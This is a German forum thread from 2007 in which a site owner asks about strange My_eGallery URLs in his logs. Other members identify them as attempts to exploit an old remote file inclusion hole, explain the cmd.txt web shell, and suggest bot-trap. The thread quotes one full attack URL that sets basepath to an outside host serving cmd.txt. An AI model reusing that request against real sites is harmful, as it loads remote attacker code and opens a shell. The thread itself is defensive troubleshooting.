My_eGallery - überlange url???

Begonnen von Muffin, 13 Juli 2007, 23:39:34

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Muffin

Hallo zusammen,
Ich habe festgestellt das einige meiner Beuscher in der gallery über extrem lange urls online sind:

meinedomain/modules.php?name=My_eGallery&file=index&do=showpic&pid=522&orderby=dateD&newlang=french/modules/My_eGallery/index.php?basepath=http://2msdance.com/language/cmd.txt?

Normaleweise ist die url:
meinedomain/modules.php?name=My_eGallery&file=index&do=showpic&pid=522&orderby=dateD&newlang=french

ohne
/modules/My_eGallery/index.php?basepath=http://2msdance.com/language/cmd.txt? hinten dranne.

Kann mir einer sagen was da los ist??? Das war hier nur ein Beispiel, die urls hinter basepath variieren, aber immer mit diesem txt? hinten.
Wenn jemand eine Erklärung hat, wäre ich sehr dankbar.


Future

Hi :),

ist jetzt nicht so ganz mein Thema, aber habe folgendes im netz gefunden.

ZitatInteressant und raffiniert ist das bei Skript-Kiddies beliebte Skript »cmd.txt«, auch als »cmd.php« bekannt. Es nimmt den Aufrufparameter »cmd« entgegen und versucht, das übergebene Kommando als Linux-Befehl mit Hilfe von »exec()« oder »system()« auszuführen. Ein Angreifer verfügt damit über eine flexible Shell. Die Unix-Kommandos übergibt er bequem in der Adresszeile des Browsers.

Vielleicht hilft es dir ja weiter

Muffin

Ich hab auch mal gegoogelt, das Ergebnis: anscheinend versuchen sie die Seite zu hacken (dem script nach zu urteilen). So wie es aussieht verursachen sie nur einen Haufen Traffic, was sehr ärgerlich ist.
Leider habe ich nichts gefunden, wie ich mich dagegen wehren könnte, jemand eine Idee??  :gruebel:

jubilee

Zitatmeinedomain/modules.php?name=My_eGallery&file=index&do=showpic&pid=522&orderby=dateD&newlang=french/modules/My_eGallery/index.php?basepath=http://2msdance.com/language/cmd.txt?

Jo, hier wird versucht eine alte (wirklich alte) Sicherheitslücke in der My_eGallery auszunutzen. Dieses Problem ist in unserer My_eGallery bereits seit 2004 gefixt. Verhindern, das jemand versucht die Seite so aufzurufen kannst Du nicht. Damit muss man als Seitebetrieber leben, das alle möglichen exploits ausprobiert werden

Barbeytes

Hallo,

ich kann da nur http://www.bot-trap.de/ empfehlen!

Es wird unter anderen auch hier von PragmaMX genutzt.

Es ist eine Community von Profis und Leihen die gemeinsam versuchen gegen, Gästebuch Spam, Formular Spam, Forum Spam, usw. anzugehen und Mitgliederwebseiten schützt.

Ich kann es nur empfehlen  :note:   :)

Schau es Dir mal an!

Gruß Guido

jubilee

Zitatich kann da nur http://www.bot-trap.de/ empfehlen!
Es wird unter anderen auch hier von PragmaMX genutzt.

Trotz der vielen sonstigen Vorteile kann auch das den Aufruf der Seite und den damit verbundenen Traffic nicht verhindern.

Muffin

Danke für eure Antworten, also habe ich nur die Möglichkeit , einfach abzuwarten bis sie es mitbekommen das es sich nicht lohnt, oder aber das Gallery script zu wechseln...
Bei Bot trap hab ich mich schon angemeldet, mal schauen wann ich das script bekomme. ;)

Andi

Zitat von: Muffin am 15 Juli 2007, 11:23:34...oder aber das Gallery script zu wechseln...
Ignoriere das einfach. Wenn du jetzt das Script wechselst, z.B. zur mx-Coppermine, dann versuchen die idioten alle möglichen Sicherheitslücken des Nuke-Moduls "coppermine" auf deiner Seite auszunutzen....
Die Deppen kennen keinen Unterschied zwischen phpNuke und pragmaMx Modulen. Es gibt massenweise Seiten im Internet, die vorgefertigte Formulare mit allen möglichen phpNuke Hacks anbieten, wo man nur noch die ziel-URL angeben muss....

Wir haben diese lächerlichen Versuche auch massenweise hier in den Logfiles, obwohl wir beide Module nichtmal hier installiert/aktiviert haben.
schön´s Grüssle, Andi

Muffin

 :BD: :BD: zuuu spät. Aber ich wollte sowieso wechseln. Ich war nur durch die url's irritiert. Mir ist übrigends aufgefallen, das manche direkt über Google nach My_eGallerys gesucht haben.Falls das irgendjemand interessiert...

Mit Bot Trap hat super funktioniert.

Danke nochmal für Eure Hilfe  :thumbup: